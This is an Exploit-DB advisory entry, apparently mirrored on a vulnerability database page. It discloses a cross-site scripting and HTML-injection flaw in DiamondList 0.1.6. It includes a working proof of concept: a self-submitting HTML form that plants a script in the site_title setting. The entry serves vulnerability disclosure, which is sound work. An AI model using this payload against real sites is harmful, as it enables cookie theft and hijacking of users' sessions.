Lucene search

K
exploitdbHigh-Tech Bridge SAEDB-ID:34413
HistoryAug 05, 2010 - 12:00 a.m.

DiamondList - '/user/main/update_settings?setting[site_title]' Cross-Site Scripting

2010-08-0500:00:00
High-Tech Bridge SA
www.exploit-db.com
11

AI Score

7.4

Confidence

Low

source: https://www.securityfocus.com/bid/42252/info

DiamondList is prone to a cross-site scripting vulnerability and an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

DiamondList 0.1.6 is vulnerable; prior versions may also be affected. 

<form action="http://www.example.com/user/main/update_settings" method="post"  name="main" >
<input type="hidden" name="setting[site_title]" value='Wishlists</title><script>alert(document.cookie)</script>' />
<input type="hidden" name="setting[site_keywords]" value="wishlists, applications" />
<input type="hidden" name="setting[site_description]" value="Powered by DiamondList" />
<input type="hidden" name="setting[theme]" value="default" />
<input type="hidden" name="commit" value="Save Settings" />

</form>
<script>
document.main.submit();
</script>

AI Score

7.4

Confidence

Low